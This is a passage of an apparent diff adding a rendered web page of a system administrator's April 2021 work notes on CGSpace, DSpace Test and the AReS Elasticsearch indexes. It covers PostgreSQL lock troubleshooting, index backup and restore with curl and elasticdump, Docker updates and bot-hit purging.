+</span></span><span style="display:flex;"><span>5f0b85be-bd23-47de-927d-bca368fa1fbc
+</span></span><span style="display:flex;"><span>646ada17-e4ef-49f6-9378-af7e58596ce1
+</span></span><span style="display:flex;"><span>7e2f4bf8-fbc9-4b2f-97a4-75e5427bef90
+</span></span><span style="display:flex;"><span>8029fd53-f9f5-4107-bfc3-8815507265cf
+</span></span><span style="display:flex;"><span>81faa934-c602-4608-bf45-de91845dfea7
+</span></span><span style="display:flex;"><span>8611a462-210c-4be1-a5bb-f87a065e6113
+</span></span><span style="display:flex;"><span>8855c903-ef86-433c-b0be-c12300eb0f84
+</span></span><span style="display:flex;"><span>8c7ece98-3598-4de7-a885-d61fd033bea8
+</span></span><span style="display:flex;"><span>8c9a0d01-2d12-4a99-84f9-cdc25ac072f9
+</span></span><span style="display:flex;"><span>8f9f888a-b501-41f3-a462-4da16150eebf
+</span></span><span style="display:flex;"><span>94168f0e-9f45-4112-ac8d-3ba9be917842
+</span></span><span style="display:flex;"><span>96998038-f381-47dc-8488-ff7252703627
+</span></span><span style="display:flex;"><span>9768f4a8-3018-44e9-bf58-beba4296327c
+</span></span><span style="display:flex;"><span>9a99e8d2-558e-4fc1-8011-e4411f658414
+</span></span><span style="display:flex;"><span>a34e6400-78ed-45c0-a751-abc039eed2e6
+</span></span><span style="display:flex;"><span>a9da5af3-4ec7-4a9b-becb-6e3d028d594d
+</span></span><span style="display:flex;"><span>abf5201c-8be5-4dee-b461-132203dd51cb
+</span></span><span style="display:flex;"><span>adb5658c-cef3-402f-87b6-b498f580351c
+</span></span><span style="display:flex;"><span>aecf811b-b7e9-4b6f-8776-3d372e6a048b
+</span></span><span style="display:flex;"><span>ba5aae61-ea34-4ac1-9490-4645acf2382f
+</span></span><span style="display:flex;"><span>bf7f3638-c7c6-4a8f-893d-891a6d3dafff
+</span></span><span style="display:flex;"><span>c617ada0-09d1-40ed-b479-1c4860a4f724
+</span></span><span style="display:flex;"><span>cff91d44-a855-458c-89e5-bd48c17d1a54
+</span></span><span style="display:flex;"><span>e65171ae-a2bf-4043-8f54-f8457bc9174b
+</span></span><span style="display:flex;"><span>e7098b40-4701-4ca2-b9a9-3a1282f67044
+</span></span><span style="display:flex;"><span>e904f122-71dc-439b-b877-313ef62486d7
+</span></span><span style="display:flex;"><span>ede59734-adac-4c01-8691-b45f19088d37
+</span></span><span style="display:flex;"><span>f88bd6bb-f93f-41cb-872f-ff26f6237068
+</span></span><span style="display:flex;"><span>f985f5fb-be5c-430b-a8f1-cf86ae4fc49a
+</span></span><span style="display:flex;"><span>fe800006-aaec-4f9e-9ab4-f9475b4cbdc3
+</span></span></code></pre></div><h2 id="2021-04-08">2021-04-08</h2>
+<ul>
+<li>I can&rsquo;t believe it but the server has been down for twelve hours or so
+<ul>
+<li>The locks have not changed since I went to bed last night:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>12070
+</span></span></code></pre></div><ul>
+<li>I restarted PostgreSQL and Tomcat and the locks go straight back up!</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>13
+</span></span><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>986
+</span></span><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>1194
+</span></span><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>1212
+</span></span><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>1489
+</span></span><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>2124
+</span></span><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>5934
+</span></span></code></pre></div><h2 id="2021-04-09">2021-04-09</h2>
+<ul>
+<li>Atmire managed to get CGSpace back up by killing all the PostgreSQL connections yesterday
+<ul>
+<li>I don&rsquo;t know how they did it&hellip;</li>
+<li>They also think it&rsquo;s weird that restarting PostgreSQL didn&rsquo;t kill the connections</li>
+<li>They asked some more questions, like for example if there were also issues on DSpace Test</li>
+<li>Strangely enough, I checked DSpace Test and notice a clear spike in PostgreSQL locks on the morning of April 6th as well!</li>
+</ul>
+</li>
+</ul>
+<p><img src="/cgspace-notes/2021/04/postgres_locks_ALL-week-PROD.png" alt="PostgreSQL locks week CGSpace">
+<img src="/cgspace-notes/2021/04/postgres_locks_ALL-week-TEST.png" alt="PostgreSQL locks week DSpace Test"></p>
+<ul>
+<li>I definitely need to look into that!</li>
+</ul>
+<h2 id="2021-04-11">2021-04-11</h2>
+<ul>
+<li>I am trying to resolve the AReS Elasticsearch index issues that happened last week
+<ul>
+<li>I decided to back up the <code>openrxv-items</code> index to <code>openrxv-items-backup</code> and then delete all the others:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-backup
+</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final&#39;</span>
+</span></span></code></pre></div><ul>
+<li>Then I updated all Docker containers and rebooted the server (linode20) so that the correct indexes would be created again:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
+</span></span></code></pre></div><ul>
+<li>Then I realized I have to clone the backup index directly to <code>openrxv-items-final</code>, and re-create the <code>openrxv-items</code> alias:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-backup/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-backup/_clone/openrxv-items-final
+</span></span><span style="display:flex;"><span>$ curl -s -X POST <span style="color:#e6db74">&#39;http://localhost:9200/_aliases&#39;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;actions&#34; : [{&#34;add&#34; : { &#34;index&#34; : &#34;openrxv-items-final&#34;, &#34;alias&#34; : &#34;openrxv-items&#34;}}]}&#39;</span>
+</span></span></code></pre></div><ul>
+<li>Now I see both <code>openrxv-items-final</code> and <code>openrxv-items</code> have the current number of items:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items/_count?q=*&amp;pretty&#39;</span>     
+</span></span><span style="display:flex;"><span>{
+</span></span><span style="display:flex;"><span>  &#34;count&#34; : 103373,
+</span></span><span style="display:flex;"><span>  &#34;_shards&#34; : {
+</span></span><span style="display:flex;"><span>    &#34;total&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;successful&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;skipped&#34; : 0,
+</span></span><span style="display:flex;"><span>    &#34;failed&#34; : 0
+</span></span><span style="display:flex;"><span>  }
+</span></span><span style="display:flex;"><span>}
+</span></span><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final/_count?q=*&amp;pretty&#39;</span>
+</span></span><span style="display:flex;"><span>{
+</span></span><span style="display:flex;"><span>  &#34;count&#34; : 103373,
+</span></span><span style="display:flex;"><span>  &#34;_shards&#34; : {
+</span></span><span style="display:flex;"><span>    &#34;total&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;successful&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;skipped&#34; : 0,
+</span></span><span style="display:flex;"><span>    &#34;failed&#34; : 0
+</span></span><span style="display:flex;"><span>  }
+</span></span><span style="display:flex;"><span>}
+</span></span></code></pre></div><ul>
+<li>Then I started a fresh harvesting in the AReS Explorer admin dashboard</li>
+</ul>
+<h2 id="2021-04-12">2021-04-12</h2>
+<ul>
+<li>The harvesting on AReS finished last night, but the indexes got messed up again
+<ul>
+<li>I will have to fix them manually next time&hellip;</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-04-13">2021-04-13</h2>
+<ul>
+<li>Looking into the logs on 2021-04-06 on CGSpace and DSpace Test to see if there is anything specific that stands out about the activty on those days that would cause the PostgreSQL issues
+<ul>
+<li>Digging into the Munin graphs for the last week I found a few other things happening on that morning:</li>
+</ul>
+</li>
+</ul>
+<p><img src="/cgspace-notes/2021/04/sda-week.png" alt="/dev/sda disk latency week">
+<img src="/cgspace-notes/2021/04/classes_unloaded-week.png" alt="JVM classes unloaded week">
+<img src="/cgspace-notes/2021/04/nginx_status-week.png" alt="Nginx status week"></p>
+<ul>
+<li>13,000 requests in the last two months from a user with user agent <code>SomeRandomText</code>, for example:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>84.33.2.97 - - [06/Apr/2021:06:25:13 +0200] &#34;GET /bitstream/handle/10568/77776/CROP%20SCIENCE.jpg.jpg HTTP/1.1&#34; 404 10890 &#34;-&#34; &#34;SomeRandomText&#34;
+</span></span></code></pre></div><ul>
+<li>I purged them:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f /tmp/agents.txt -p
+</span></span><span style="display:flex;"><span>Purging 13159 hits from SomeRandomText in statistics
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 13159
+</span></span></code></pre></div><ul>
+<li>I noticed there were 78 items submitted in the hour before CGSpace crashed:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># grep -a -E <span style="color:#e6db74">&#39;2021-04-06 0(6|7):&#39;</span> /home/cgspace.cgiar.org/log/dspace.log.2021-04-06 | grep -c -a add_item 
+</span></span><span style="display:flex;"><span>78
+</span></span></code></pre></div><ul>
+<li>Of those 78, 77 of them were from Udana</li>
+<li>Compared to other mornings (0 to 9 AM) this month that seems to be pretty high:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># <span style="color:#66d9ef">for</span> num in <span style="color:#f92672">{</span>01..13<span style="color:#f92672">}</span>; <span style="color:#66d9ef">do</span> grep -a -E <span style="color:#e6db74">&#34;2021-04-</span>$num<span style="color:#e6db74"> 0&#34;</span> /home/cgspace.cgiar.org/log/dspace.log.2021-04-$num | grep -c -a
+</span></span><span style="display:flex;"><span> add_item; done
+</span></span><span style="display:flex;"><span>32
+</span></span><span style="display:flex;"><span>0
+</span></span><span style="display:flex;"><span>0
+</span></span><span style="display:flex;"><span>2
+</span></span><span style="display:flex;"><span>8
+</span></span><span style="display:flex;"><span>108
+</span></span><span style="display:flex;"><span>4
+</span></span><span style="display:flex;"><span>0
+</span></span><span style="display:flex;"><span>29
+</span></span><span style="display:flex;"><span>0
+</span></span><span style="display:flex;"><span>1
+</span></span><span style="display:flex;"><span>1
+</span></span><span style="display:flex;"><span>2
+</span></span></code></pre></div><h2 id="2021-04-15">2021-04-15</h2>
+<ul>
+<li>Release v1.4.2 of the DSpace Statistics API on GitHub: <a href="https://github.com/ilri/dspace-statistics-api/releases/tag/v1.4.2">https://github.com/ilri/dspace-statistics-api/releases/tag/v1.4.2</a>
+<ul>
+<li>This has been running on DSpace Test for the last week or so, and mostly contains the Falcon 3.0.0 changes</li>
+</ul>
+</li>
+<li>Re-sync DSpace Test with data from CGSpace
+<ul>
+<li>Run system updates on DSpace Test (linode26) and reboot the server</li>
+</ul>
+</li>
+<li>Update the PostgreSQL JDBC driver on DSpace Test (linode26) to 42.2.19
+<ul>
+<li>It has been a few months since we updated this, and there have been a few releases since 42.2.14 that we are currently using</li>
+</ul>
+</li>
+<li>Create a test account for Rafael from Bioversity-CIAT to submit some items to DSpace Test:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace user -a -m tip-submit@cgiar.org -g CIAT -s Submit -p <span style="color:#e6db74">&#39;fuuuuuuuu&#39;</span>
+</span></span></code></pre></div><ul>
+<li>I added the account to the Alliance Admins account, which is should allow him to submit to any Alliance collection
+<ul>
+<li>According to my notes from <a href="/cgspace-notes/2020-10/">2020-10</a> the account must be in the admin group in order to submit via the REST API</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-04-18">2021-04-18</h2>
+<ul>
+<li>Update all containers on AReS (linode20):</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
+</span></span></code></pre></div><ul>
+<li>Then run all system updates and reboot the server</li>
+<li>I learned a new command for Elasticsearch:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl http://localhost:9200/_cat/indices
+</span></span><span style="display:flex;"><span>yellow open openrxv-values           ChyhGwMDQpevJtlNWO1vcw 1 1   1579      0 537.6kb 537.6kb
+</span></span><span style="display:flex;"><span>yellow open openrxv-items-temp       PhV5ieuxQsyftByvCxzSIw 1 1 103585 104372 482.7mb 482.7mb
+</span></span><span style="display:flex;"><span>yellow open openrxv-shared           J_8cxIz6QL6XTRZct7UBBQ 1 1    127      0 115.7kb 115.7kb
+</span></span><span style="display:flex;"><span>yellow open openrxv-values-00001     jAoXTLR0R9mzivlDVbQaqA 1 1   3903      0 696.2kb 696.2kb
+</span></span><span style="display:flex;"><span>green  open .kibana_task_manager_1   O1zgJ0YlQhKCFAwJZaNSIA 1 0      2      2  20.6kb  20.6kb
+</span></span><span style="display:flex;"><span>yellow open openrxv-users            1hWGXh9kS_S6YPxAaBN8ew 1 1      5      0  28.6kb  28.6kb
+</span></span><span style="display:flex;"><span>green  open .apm-agent-configuration f3RAkSEBRGaxJZs3ePVxsA 1 0      0      0    283b    283b
+</span></span><span style="display:flex;"><span>yellow open openrxv-items-final      sgk-s8O-RZKdcLRoWt3G8A 1 1    970      0   2.3mb   2.3mb
+</span></span><span style="display:flex;"><span>green  open .kibana_1                HHPN7RD_T7qe0zDj4rauQw 1 0     25      7  36.8kb  36.8kb
+</span></span><span style="display:flex;"><span>yellow open users                    M0t2LaZhSm2NrF5xb64dnw 1 1      2      0  11.6kb  11.6kb
+</span></span></code></pre></div><ul>
+<li>Somehow the <code>openrxv-items-final</code> index only has a few items and the majority are in <code>openrxv-items-temp</code>, via the <code>openrxv-items</code> alias (which is in the temp index):</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items/_count?q=*&amp;pretty&#39;</span> 
+</span></span><span style="display:flex;"><span>{
+</span></span><span style="display:flex;"><span>  &#34;count&#34; : 103585,
+</span></span><span style="display:flex;"><span>  &#34;_shards&#34; : {
+</span></span><span style="display:flex;"><span>    &#34;total&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;successful&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;skipped&#34; : 0,
+</span></span><span style="display:flex;"><span>    &#34;failed&#34; : 0
+</span></span><span style="display:flex;"><span>  }
+</span></span><span style="display:flex;"><span>}
+</span></span></code></pre></div><ul>
+<li>I found a cool tool to help with exporting and restoring Elasticsearch indexes:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_mapping.json --type<span style="color:#f92672">=</span>mapping
+</span></span><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_data.json --limit<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span> --type<span style="color:#f92672">=</span>data
+</span></span><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>Sun, 18 Apr 2021 06:27:07 GMT | Total Writes: 103585
+</span></span><span style="display:flex;"><span>Sun, 18 Apr 2021 06:27:07 GMT | dump complete
+</span></span></code></pre></div><ul>
+<li>It took only two or three minutes to export everything&hellip;</li>
+<li>I did a test to restore the index:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>/home/aorth/openrxv-items_mapping.json --output<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items-test --type<span style="color:#f92672">=</span>mapping
+</span></span><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>/home/aorth/openrxv-items_data.json --output<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items-test --limit <span style="color:#ae81ff">1000</span> --type<span style="color:#f92672">=</span>data
+</span></span></code></pre></div><ul>
+<li>So that&rsquo;s pretty cool!</li>
+<li>I deleted the <code>openrxv-items-final</code> index and <code>openrxv-items-temp</code> indexes and then restored the mappings to <code>openrxv-items-final</code>, added the <code>openrxv-items</code> alias, and started restoring the data to <code>openrxv-items</code> with elasticdump:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final&#39;</span>
+</span></span><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>/home/aorth/openrxv-items_mapping.json --output<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items-final --type<span style="color:#f92672">=</span>mapping
+</span></span><span style="display:flex;"><span>$ curl -s -X POST <span style="color:#e6db74">&#39;http://localhost:9200/_aliases&#39;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;actions&#34; : [{&#34;add&#34; : { &#34;index&#34; : &#34;openrxv-items-final&#34;, &#34;alias&#34; : &#34;openrxv-items&#34;}}]}&#39;</span>
+</span></span><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>/home/aorth/openrxv-items_data.json --output<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --limit <span style="color:#ae81ff">1000</span> --type<span style="color:#f92672">=</span>data
+</span></span></code></pre></div><ul>
+<li>AReS seems to be working fine аfter that, so I created the <code>openrxv-items-temp</code> index and then started a fresh harvest on AReS Explorer:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp&#34;</span>
+</span></span></code></pre></div><ul>
+<li>Run system updates on CGSpace (linode18) and run the latest Ansible infrastructure playbook to update the DSpace Statistics API, PostgreSQL JDBC driver, etc, and then reboot the system</li>
+<li>I wasted a bit of time trying to get TSLint and then ESLint running for OpenRXV on GitHub Actions</li>
+</ul>
+<h2 id="2021-04-19">2021-04-19</h2>
+<ul>
+<li>The AReS harvesting last night seems to have completed successfully, but the number of results is strange:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
+</span></span><span style="display:flex;"><span>yellow open openrxv-items-temp       kNUlupUyS_i7vlBGiuVxwg 1 1 103741 105553 483.6mb 483.6mb
+</span></span><span style="display:flex;"><span>yellow open openrxv-items-final      HFc3uytTRq2GPpn13vkbmg 1 1    970      0   2.3mb   2.3mb
+</span></span></code></pre></div><ul>
+<li>The indices endpoint doesn&rsquo;t include the <code>openrxv-items</code> alias, but it is currently in the <code>openrxv-items-temp</code> index so the number of items is the same:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items/_count?q=*&amp;pretty&#39;</span>     
+</span></span><span style="display:flex;"><span>{
+</span></span><span style="display:flex;"><span>  &#34;count&#34; : 103741,
+</span></span><span style="display:flex;"><span>  &#34;_shards&#34; : {
+</span></span><span style="display:flex;"><span>    &#34;total&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;successful&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;skipped&#34; : 0,
+</span></span><span style="display:flex;"><span>    &#34;failed&#34; : 0
+</span></span><span style="display:flex;"><span>  }
+</span></span><span style="display:flex;"><span>}
+</span></span></code></pre></div><ul>
+<li>A user was having problems resetting their password on CGSpace, with some message about SMTP etc
+<ul>
+<li>I checked and we are indeed locked out of our mailbox:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace test-email
+</span></span><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>Error sending email:
+</span></span><span style="display:flex;"><span> - Error: javax.mail.SendFailedException: Send failure (javax.mail.AuthenticationFailedException: 550 5.2.1 Mailbox cannot be accessed [PR0P264CA0280.FRAP264.PROD.OUTLOOK.COM]
+</span></span><span style="display:flex;"><span>)
+</span></span></code></pre></div><ul>
+<li>I have to write to ICT&hellip;</li>
+<li>I decided to switch back to the G1GC garbage collector on DSpace Test
+<ul>
+<li>Reading Shawn Heisy&rsquo;s discussion again: <a href="https://cwiki.apache.org/confluence/display/SOLR/ShawnHeisey">https://cwiki.apache.org/confluence/display/SOLR/ShawnHeisey</a></li>
+<li>I am curious to check the JVM stats in a few days to see if there is a marked change</li>
+</ul>
+</li>
+<li>Work on minor changes to get DSpace working on Ubuntu 20.04 for our <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure scripts</a></li>
+</ul>
+<h2 id="2021-04-21">2021-04-21</h2>
+<ul>
+<li>Send Abdullah feedback on the <a href="https://github.com/ilri/OpenRXV/pull/91">filter on click pull request</a> for OpenRXV
+<ul>
+<li>I see it adds a new &ldquo;allow filter on click&rdquo; checkbox in the layout settings, but it doesn&rsquo;t modify the filters</li>
+<li>Also, it seems to have broken the existing clicking of the countries on the map</li>
+</ul>
+</li>
+<li>Atmire recently sent feedback about the CUA duplicates processor
+<ul>
+<li>Last month when I ran it it got stuck on the storage reports, apparently, so I will try again (with a fresh Solr statistics core from production) and skip the storage reports (<code>-g</code>):</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#39;-Dfile.encoding=UTF-8 -Xmx2048m&#39;
+$ cp atmire-cua-update.xml-20210124-132112.old /home/dspacetest.cgiar.org/config/spring/api/atmire-cua-update.xml
+$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -r 100 -c statistics -t 12 -g
+</code></pre><ul>
+<li>The first run processed 1,439 docs, the second run processed 0 docs
+<ul>
+<li>I&rsquo;m not sure if that means that it worked? I sent feedback to Atmire</li>
+</ul>
+</li>
+<li>Meeting with Moayad to discuss OpenRXV development progress</li>
+</ul>
+<h2 id="2021-04-25">2021-04-25</h2>
+<ul>
+<li>The indexes on AReS are messed up again
+<ul>
+<li>I made a backup of the indexes, then deleted the <code>openrxv-items-final</code> and <code>openrxv-items-temp</code> indexes, re-created the <code>openrxv-items</code> alias, and restored the data into <code>openrxv-items</code>:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_mapping.json --type<span style="color:#f92672">=</span>mapping
+</span></span><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_data.json --limit<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span> --type<span style="color:#f92672">=</span>data
+</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final&#39;</span>
+</span></span><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>/home/aorth/openrxv-items_mapping.json --output<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items-final --type<span style="color:#f92672">=</span>mapping
+</span></span><span style="display:flex;"><span>$ curl -s -X POST <span style="color:#e6db74">&#39;http://localhost:9200/_aliases&#39;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;actions&#34; : [{&#34;add&#34; : { &#34;index&#34; : &#34;openrxv-items-final&#34;, &#34;alias&#34; : &#34;openrxv-items&#34;}}]}&#39;</span>
